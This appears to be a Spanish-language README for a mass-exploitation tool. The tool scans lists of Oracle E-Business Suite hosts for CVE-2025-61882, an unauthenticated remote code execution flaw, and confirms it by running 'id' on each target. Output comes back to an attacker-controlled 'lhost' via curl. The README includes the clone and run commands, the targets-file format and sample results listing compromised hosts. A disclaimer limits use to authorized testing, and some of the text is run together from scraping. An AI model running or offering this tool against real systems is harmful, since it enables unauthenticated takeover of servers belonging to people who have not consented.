
Escáner multihilo para CVE-2025-61882 en Oracle E-Business Suite, que explota el contrabando de solicitudes HTTP para lograr ejecución remota de código no autenticada y validar mediante la salida de comandos.
Un escáner masivo rápido y multi-hilo para detectar CVE-2025-61882 en instalaciones de Oracle E-Business Suite. Esta vulnerabilidad crítica permite la ejecución remota de código sin autenticación.
id y analizando la salidavuln-output.txt inmediatamentepip install requests
Eso es todo. Solo Python 3.7+ y la librería requests.
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt
python3 cve-2025-61882.py --targets targets.txt --lhost TU_IP_VPS
python3 cve-2025-61882.py --targets targets.txt --lhost TU_IP_VPS --threads 50
python3 cve-2025-61882.py --targets targets.txt --lhost TU_IP_VPS --threads 10
Crea un archivo targets.txt con una URL por línea:
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com
╔═══════════════════════════════════════════════════════════════╗
║ Oracle E-Business Suite RCE Scanner (CVE-2025-61882) ║
╚═══════════════════════════════════════════════════════════════╝
[*] Cargados 1235 objetivos desde el archivo
[*] Ejecutando con 20 hilos concurrentes
[*] Los hosts vulnerables se guardarán en vuln-output.txt
[*] [1/1235] Comprobando https://target1.com:443 en el puerto 7893
[*] [2/1235] Comprobando https://target2.com:443 en el puerto 5882
[+] ¡Encontrado! 129.146.56.43 es vulnerable
[+] Salida del comando: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
=================================================================
[*] Escaneo finalizado en 245.67 segundos
[*] Encontrados 3 objetivo(s) vulnerable(s)
[*] Revisa vuln-output.txt para ver los resultados completos
=================================================================
[+] Objetivos vulnerables encontrados:
129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
10.0.0.100 → uid=500(oracle) gid=500(oinstall)
Los resultados se guardan en vuln-output.txt:
# Oracle EBS CVE-2025-61882 - Resultados del Escaneo
# Iniciado: Tue Oct 07 15:30:45 2025
# Total de objetivos: 1235
# Escáner por: Chirag Artani
129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)
id y envía la salida de vuelta mediante curluid=...gid=...Esta herramienta es solo para pruebas de seguridad autorizadas. Siempre:
El acceso no autorizado a sistemas informáticos es ilegal.
¿Encontraste un error? ¿Tienes una solicitud de función?
git checkout -b feature/caracteristica-increible)git commit -m 'Añadir alguna característica')git push origin feature/caracteristica-increible)Este proyecto está licenciado bajo la Licencia MIT - consulta el archivo LICENSE para más detalles.
Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El autor no es responsable de ningún uso indebido o daño causado por esta herramienta. Úsala bajo tu propio riesgo.
Sitio Web • Twitter • LinkedIn
Hecho con ❤️ para la comunidad de infosec
| Argumento | Requerido | Por Defecto | Descripción |
|---|
--targets | Sí | - | Ruta al archivo que contiene las URLs de los objetivos |
--lhost | Sí | - | Tu IP de VPS/atacante |
--threads | No | 20 | Número de hilos concurrentes |